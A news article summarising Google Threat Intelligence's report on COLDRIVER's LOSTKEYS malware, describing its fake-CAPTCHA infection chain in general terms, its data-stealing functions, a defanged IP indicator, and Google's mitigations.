COLDRIVER's New Malware LOSTKEYS Targets Western Entities

COLDRIVER, a Russian-backed threat group, has been identified using a new malware called LOSTKEYS to steal documents and system information from Western targets. This information comes from a report published by GoogleGOOG-- Threat Intelligence on May 7. The malware is designed to infiltrate systems and exfiltrate sensitive data, posing a significant threat to the security of targeted entities.

The LOSTKEYS malware is part of a broader campaign by COLDRIVER, which has been previously linked to Russia's Federal Security Service. The group is known for its sophisticated tactics and techniques, particularly in stealing login credentials and other sensitive information. The use of LOSTKEYS represents an evolution in their methods, showcasing their ability to adapt and develop new tools to evade detection and continue their malicious activities.

The malware is installed through a four-step process. The process involves a “lure website” with a fake CAPTCHA, a PowerShell script downloaded to the user’s clipboard, some device evasion, and retrieval of the final payload. Lastly, the malware is installed. LOSTKEYS is capable of stealing files from extensions and directories. It can also send system information and running processes back to COLDRIVER. The address from which the parts of the attack come is “165.227.148[.]68” according to Google.

Google has already taken steps to mitigate any damage the LOSTKEYS malware will cause, including adding the malicious websites to the company’s “Safe Browsing” feature. This proactive measure is crucial in protecting users from falling victim to the malware.

COLDRIVER is known for its phishing attempts at high-profile Western targets, such as former diplomats, and journalists. In January 2024, it started an attack with a malware called “Spica,” which can execute arbitrary shellSHEL-- commands and download or upload software. The discovery of LOSTKEYS underscores the ongoing cyber threats posed by state-sponsored hacking groups. These groups often target organizations and individuals in Western countries, seeking to gain access to valuable information or disrupt operations. The use of malware like LOSTKEYS highlights the need for robust cybersecurity measures to protect against such threats. Organizations must remain vigilant and implement proactive hardening recommendations to defend against the evolving tactics of cybercriminals.

The identification of LOSTKEYS by Google Threat Intelligence is a critical step in raising awareness about the latest cyber threats. By sharing information about the malware and its associated hacking group, Google is helping to equip organizations with the knowledge they need to protect themselves. This collaborative approach to cybersecurity is essential in the fight against state-sponsored hacking and other forms of cybercrime.